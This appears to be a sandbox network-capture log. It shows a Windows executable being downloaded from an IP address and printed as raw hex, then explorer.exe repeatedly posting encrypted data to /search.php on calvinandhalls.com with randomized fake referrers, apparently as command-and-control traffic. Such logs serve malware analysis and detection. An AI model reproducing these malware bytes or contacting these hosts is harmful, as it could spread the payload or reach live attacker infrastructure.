                                                                                                                            Host: 23.145.40.164
                                                                                                                            2024-10-03 00:52:53 UTC327INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:53 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Last-Modified: Thu, 03 Oct 2024 00:45:02 GMT
                                                                                                                            ETag: "3be00-62387dd635997"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 245248
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                            2024-10-03 00:52:53 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a ba 69 7a 3e db 07 29 3e db 07 29 3e db 07 29 83 94 91 29 3f db 07 29 20 89 83 29 23 db 07 29 20 89 92 29 2d db 07 29 20 89 84 29 54 db 07 29 19 1d 7c 29 39 db 07 29 3e db 06 29 49 db 07 29 20 89 8d 29 3f db 07 29 20 89 93 29 3f db 07 29 20 89 96 29 3f db 07 29 52 69 63 68 3e db 07 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 11 aa 35 64 00 00 00
                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ziz>)>)>))?) )#) )-) )T)|)9)>)I) )?) )?) )?)Rich>)PEL5d
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: c5 ac e2 41 00 53 57 e8 2e 33 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 bc 14 00 00 83 c4 14 68 10 20 01 00 68 78 b7 41 00 57 e8 a1 31 00 00 83 c4 0c eb 32 6a f4 ff 15 58 b0 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac e2 41 00 ff 36 e8 2b 13 00 00 59 50 ff 36 53 ff 15 f0 b0 41 00 5f 5e 5b c9 c3 6a 03 e8 58 34 00 00 59 83 f8 01 74 15 6a 03 e8 4b 34 00 00 59 85 c0 75 1f 83 3d 04 e0 41 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 8b ff 55 8b ec 8b 45 08 a3 94 01 42 00 5d c3 8b ff 55 8b ec ff 35 94 01 42 00 e8 f5 0c 00 00 59 85 c0 74 0f ff 75 08 ff d0 59 85 c0 74 05 33 c0 40 5d c3 33 c0 5d c3 8b ff 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 62 e6 ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30
                                                                                                                            Data Ascii: ASW.3tVVVVVh hxAW12jXA;t$tjEP4A6+YP6SA_^[jX4YtjK4Yu=Auh)hYYUEB]U5BYtuYt3@]3]UVWuMbEu3;t0
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: 83 c7 04 59 89 06 83 ff 28 72 e8 5f 5e c3 cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 8b 4d 08 b8 4d 5a 00 00 66 39 01 74 04 33 c0 5d c3 8b 41 3c 03 c1 81 38 50 45 00 00 75 ef 33 d2 b9 0b 01 00 00 66 39 48 18 0f 94 c2 8b c2 5d c3 cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 8b 45 08 8b 48 3c 03 c8 0f b7 41 14 53 56 0f b7 71 06 33 d2 57 8d 44 08 18 85 f6 76 1b 8b 7d 0c 8b 48 0c 3b f9 72 09 8b 58 08 03 d9 3b fb 72 0a 42 83 c0 28 3b d6 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 58 c6 41 00 68 d0 26 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 08 e0 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 2a ff ff ff 83 c4 04 85 c0 74 55 8b 45 08 2d 00 00 40 00 50 68 00
                                                                                                                            Data Ascii: Y(r_^UMMZf9t3]A<8PEu3f9H]UEH<ASVq3WDv}H;rX;rB(;r3_^[]UjhXAh&@dPSVWA1E3PEdeEh@*tUE-@Ph
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 83 c9 ff 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01 0f a3 04 24 73 ee 8b c1 83 c4 20 5e c9 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4 75 d2 8b ff 33 c0 c3 90 1b c0 d1 e0 83 c0 01 c3 f7 c2 01 00 00 00 74 18 8a 02 83 c2 01 3a 01 75 e7 83 c1 01 0a c0 74 dc f7 c2 02 00 00 00 74 a4 66 8b 02 83 c2 02 3a 01 75 ce 0a c0 74 c6 3a 61 01 75 c5 0a e4 74 bd 83 c1 02 eb 88 cc cc cc cc cc cc cc cc 55 8b ec 57 56 8b 75 0c 8b 4d 10 8b 7d 08 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 a4 01 00 00 81 f9 00 01 00 00 72 1f 83 3d 44 71 51 00 00 74 16 57 56 83 e7 0f 83 e6
                                                                                                                            Data Ascii: $uIt$s ^T$L$u<:u.t&:au%t:Aut:auu3t:uttf:ut:autUWVuM};v;r=DqQtWV
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: 08 40 40 66 85 c9 75 f6 2b 45 08 d1 f8 48 5d c3 6a 10 68 18 c7 41 00 e8 db 9d ff ff 8b 5d 08 85 db 75 0e ff 75 0c e8 88 88 ff ff 59 e9 cc 01 00 00 8b 75 0c 85 f6 75 0c 53 e8 58 87 ff ff 59 e9 b7 01 00 00 83 3d 7c 72 51 00 03 0f 85 93 01 00 00 33 ff 89 7d e4 83 fe e0 0f 87 8a 01 00 00 6a 04 e8 97 92 ff ff 59 89 7d fc 53 e8 c0 92 ff ff 59 89 45 e0 3b c7 0f 84 9e 00 00 00 3b 35 6c 72 51 00 77 49 56 53 50 e8 a2 97 ff ff 83 c4 0c 85 c0 74 05 89 5d e4 eb 35 56 e8 71 9a ff ff 59 89 45 e4 3b c7 74 27 8b 43 fc 48 3b c6 72 02 8b c6 50 53 ff 75 e4 e8 cd e0 ff ff 53 e8 70 92 ff ff 89 45 e0 53 50 e8 96 92 ff ff 83 c4 18 39 7d e4 75 48 3b f7 75 06 33 f6 46 89 75 0c 83 c6 0f 83 e6 f0 89 75 0c 56 57 ff 35 24 fd 41 00 ff 15 b0 b0 41 00 89 45 e4 3b c7 74 20 8b 43 fc 48 3b
                                                                                                                            Data Ascii: @@fu+EH]jhA]uuYuuSXY=|rQ3}jY}SYE;;5lrQwIVSPt]5VqYE;t'CH;rPSuSpESP9}uH;u3FuuVW5$AAE;t CH;
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: 08 75 11 50 e8 4a ff ff ff 59 83 f8 ff 74 1e ff 45 e4 eb 19 39 7d 08 75 14 f6 c1 02 74 0f 50 e8 2f ff ff ff 59 83 f8 ff 75 03 09 45 dc 89 7d fc e8 08 00 00 00 46 eb 84 33 ff 8b 75 e0 a1 2c 61 51 00 ff 34 b0 56 e8 d5 0a 00 00 59 59 c3 c7 45 fc fe ff ff ff e8 12 00 00 00 83 7d 08 01 8b 45 e4 74 03 8b 45 dc e8 91 7e ff ff c3 6a 01 e8 70 72 ff ff 59 c3 6a 01 e8 1f ff ff ff 59 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 1a ef ff ff a1 08 e0 41 00 33 c5 89 45 fc 8b 45 0c 56 33 f6 89 85 34 e5 ff ff 89 b5 38 e5 ff ff 89 b5 30 e5 ff ff 39 75 10 75 07 33 c0 e9 e9 06 00 00 3b c6 75 27 e8 17 71 ff ff 89 30 e8 fd 70 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 26 98 ff ff 83 c4 14 83 c8 ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 60 71 51 00 8b 06 83 e7 1f c1 e7 06
                                                                                                                            Data Ascii: uPJYtE9}utP/YuE}F3u,aQ4VYYE}EtE~jprYjYUA3EEV34809uu3;u'q0pVVVVV&SW}4`qQ
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: fe 5c cd e0 cf ea 19 74 f6 88 b1 91 69 de 10 61 d2 0a da 34 33 60 af b8 47 cc 54 96 02 85 bb 17 6d 7a f5 d9 85 6c 91 d8 74 b0 5d ed fd f1 22 df 0a 44 f0 c9 34 83 d0 21 e1 1f 6b 6f ab 11 61 b5 a8 90 d1 c5 ad 97 63 2e a6 97 4a ef c7 59 66 d8 a9 84 f8 52 ef 99 17 9d cb d7 7d 35 14 1b 78 f7 2a 2a 85 fa d4 57 06 df 80 d4 0c 46 73 67 d3 ec 3a f2 8e d4 c5 8c dc 2d 9c 70 52 95 e7 4d 86 a0 6f 4b 6b 43 aa 51 19 01 d7 9e 3c 24 58 7d 13 18 58 3e 06 e0 f0 df b3 09 69 23 d6 73 63 6a 40 86 e9 5e e5 f2 63 9a da 13 b4 92 6d 08 cf f6 8b 09 95 00 9c 57 0e ff 96 35 82 f6 fc 22 47 34 16 42 be c1 e6 97 02 e2 5f 85 40 66 a8 ce 4f e9 90 c0 10 20 b4 79 f3 9e 89 c9 10 3b d3 04 c7 7c 12 34 14 fe 8f 72 86 ac a7 a4 b0 ff 62 1f 8a 8e f6 23 58 5a 32 61 c0 23 38 dc a0 56 ef 61 ac 4a e6
                                                                                                                            Data Ascii: \tia43`GTmzlt]"D4!koac.JYfR}5x**WFsg:-pRMoKkCQ<$X}X>i#scj@^cmW5"G4B_@fO y;|4rb#XZ2a#8VaJ
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: 3e ae 96 ef 4e f6 0f 4f bd 7f 71 5c 6e f3 ca d2 ef 3c 47 88 23 44 74 34 ba 13 01 4a 5f 2e c8 86 0a 0c 69 20 e8 46 d9 71 d0 69 90 a5 6f 1a 2c 4e d5 01 5b 10 dc 70 33 f5 2d b8 98 84 26 cf 7a 9e e6 c4 3a c1 53 0e 17 52 24 37 ac 7e ab d4 e6 6b ee 81 3d 05 99 68 09 3f f0 86 82 70 ee 8d 4a a4 2b 54 ee fa 2a fd 64 5c 53 8b 95 13 8e 82 34 0e 22 e4 5c eb 81 db 19 07 b5 55 84 7f 30 eb d1 29 38 d4 8b 30 26 6a 0f 41 c2 1c 83 e7 ea 55 a9 3c 5f b9 54 22 69 bf 8a c8 00 18 78 99 e8 cb 55 39 b8 3d a5 9e c9 09 b5 09 51 52 60 be 12 02 17 fb 5c d0 d4 b5 50 68 85 1e 23 e2 24 d0 c5 66 5a ae 3d 71 bb bb 68 39 ac 90 ff 5e 00 a8 59 18 31 55 56 be 67 85 57 11 e6 a4 0f 10 5b fc 52 54 53 bf f0 50 d1 c3 20 e3 1e 30 24 b0 4a bf fc 3f 89 65 0f b3 05 13 29 5c 69 fb 9f d8 d3 42 8a 15 74
                                                                                                                            Data Ascii: >NOq\n<G#Dt4J_.i Fqio,N[p3-&z:SR$7~k=h?pJ+T*d\S4"\U0)80&jAU<_T"ixU9=QR`\Ph#$fZ=qh9^Y1UVgW[RTSP 0$J?e)\iBt
                                                                                                                            2024-10-03 00:52:53 UTC8000INData Raw: e2 a6 41 48 13 5d 95 56 6e b0 ae df 08 be c0 08 c2 e9 ea f1 df 2b e9 3a 6e d7 c4 a4 16 e0 af ca ee 62 5f 1e a4 40 01 bd 22 76 b3 ec c3 2d 2c 77 90 bf b7 84 bf 93 93 a6 0d b3 33 b7 a1 3a de cd 3b 66 94 07 72 54 13 d9 fa 2e a2 b4 c6 1f 61 f2 26 f4 df 95 27 9d 83 39 7a a9 6d b0 8b ea b7 e7 5f fb af 8f 8f d9 0d 0e ef f9 fe dc 84 09 d1 61 db bc ba 5f a5 94 5e 91 9f 86 11 63 32 75 e7 45 ec 5b 22 f1 2a 09 af 16 6a 9f 03 b0 f1 86 a0 b5 ed 14 b4 d8 7a 35 8d 4d 4c 16 f0 f4 39 35 39 57 61 17 b0 c6 02 7c d3 03 92 30 24 65 8b 7a 58 4a ca 57 68 8c 4d c7 07 e4 be 3a 64 14 eb 30 fa 8c 89 af f9 74 a1 44 1e 40 68 31 f0 72 8c a2 77 b9 aa 5b 1e 45 87 34 fc fc ac fe f9 54 bf 35 b0 24 3a 87 83 31 78 eb dc 93 be cb be bc 42 b9 b8 75 0f be 3f 28 6f 5f dd 6b cb 2c 5e 4d 9b 25 44
                                                                                                                            Data Ascii: AH]Vn+:nb_@"v-,w3:;frT.a&'9zm_a_^c2uE["*jz5ML959Wa|0$ezXJWhM:d0tD@h1rw[E4T5$:1xBu?(o_k,^M%D


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.44976823.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:17 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://chraqvgclyunxk.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 274
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:17 UTC274OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 3a a5 6b eb d8 fc 1f 43 d3 3b 64 b8 4a d6 f2 7b 69 ea 0c 53 3e d0 a6 ef 39 fb d7 6e 58 c5 e4 60 9a 29 62 bf 98 56 13 5d 5e 59 4b 80 31 9b e2 c9 59 9f ad 76 2b 3c bf 52 46 d0 2b 50 d8 85 a6 92 0e 68 8d 5d e8 2a a9 1f 25 8e 47 89 43 23 7e 02 12 b4 f9 60 e1 a4 06 84 35 1f d6 fa a6 10 d8 b8 02 ed a9 f2 c0 2d 40 87 98 c7 4c 15 94 63 39 f0 0d 11 23 f1 38 2e 53 e7 34 6e 5b 94 a2 eb 11 77 d0 a1 33 ba 52 9e bb e7 19 07 62 70 fe 5f 2c 7a 56 74 d4 3a 8b 9f 76 50 79 31 4a 9d 95 50 3a 31 27 8f 81 c7 34 cc b2 01 9d 43 92 90 e3 99 7c db 7c
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLj4%<:kC;dJ{iS>9nX`)bV]^YK1Yv+<RF+Ph]*%GC#~`5-@Lc9#8.S4n[w3Rbp_,zVt:vPy1JP:1'4C||
                                                                                                                            2024-10-03 00:53:17 UTC294INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:17 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            2024-10-03 00:53:17 UTC7898INData Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 58 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa
                                                                                                                            Data Ascii: 1ee6X[!`.{2Pr>iLn*"DwQmZZKQ@@V4*4"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
                                                                                                                            2024-10-03 00:53:17 UTC18INData Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c
                                                                                                                            Data Ascii: JMQF 82
                                                                                                                            2024-10-03 00:53:17 UTC2INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-03 00:53:17 UTC8192INData Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f
                                                                                                                            Data Ascii: 2000CC*vH(= | _ztb8PjV7+ytfq:2VHEt4T>=*&2)_UmzKut|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
                                                                                                                            2024-10-03 00:53:17 UTC6INData Raw: 97 20 09 6c 1a f8
                                                                                                                            Data Ascii: l
                                                                                                                            2024-10-03 00:53:17 UTC2INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-03 00:53:17 UTC8192INData Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5
                                                                                                                            Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
                                                                                                                            2024-10-03 00:53:17 UTC6INData Raw: 60 4f 16 27 c7 be
                                                                                                                            Data Ascii: `O'
                                                                                                                            2024-10-03 00:53:17 UTC2INData Raw: 0d 0a
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.44976923.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:18 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://inghaccxrhcia.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 327
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:18 UTC327OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 35 f1 1c fe c1 c8 5c 46 a9 2a 35 ff 28 81 96 3e 1f c8 74 49 39 8b e3 f5 5e a4 c3 70 04 d8 e8 42 b8 2a 4c bf d1 06 04 23 16 39 23 e9 07 db 84 d8 5b fe 81 45 11 22 bc 0a 54 a0 42 54 fd e5 a7 a7 4a 01 92 42 a4 2a 80 05 7f 8e 30 ac 33 2a 6f 3d 45 a0 dc 66 e0 d5 22 c1 1e 3c db e7 a9 2e ac 9d 59 97 b5 aa 90 28 46 da b2 aa 1c 58 c0 65 33 fd 01 1a 09 a1 29 09 27 ee 17 17 3f 9d d1 d2 2a 33 89 ae 2c ef 34 94 d0 cb 29 09 19 55 f5 10 65 00 0f 1c ef 48 92 9d 78 32 29 51 55 d9 81 44 64 4e 2c 91 fa f0 1b d5 f9 32 f2 4d d0 b7 ca ad 07 93 6d
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lj4%<5\F*5(>tI9^pB*L#9#[E"TBTJB*03*o=Ef"<.Y(FXe3)'?*3,4)UeHx2)QUDdN,2Mm
                                                                                                                            2024-10-03 00:53:19 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:19 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.44977023.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:19 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://uwadsovjohptv.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 200
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:19 UTC200OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 5d a9 21 eb dc ba 12 10 ae 75 26 a3 7a c9 ed 79 08 a9 7a 37 76 bf bf cf 75 e5 dc 0e 1f de 9b 26 81 6d 59 9a f8 1a 28 37 45 12 47 c5 08 de 89 9c 27 97 ea 61 07 48 fe 66 26 c5 4d 64 92 e3 80 da 23 66 c9 61 e9 44 ef 62 4c 95 2d 8e 2c 6f 61 66 04 c0 d0 5f f0 99 00 8a 42 1e 8d da dc 09 be 85 7d f2 8b ab df 27 36 d2 ae 8c 61 43 a0 5f 5c e0 2c 0c 0a a7 4b 74 78 ca 53 5d
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lk4%<]!u&zyz7vu&mY(7EG'aHf&Md#faDbL-,oaf_B}'6aC_\,KtxS]
                                                                                                                            2024-10-03 00:53:20 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:19 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.44977123.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:20 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://dqjcshdhfiffhik.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 285
                                                                                                                            Host: calvinandhalls.com
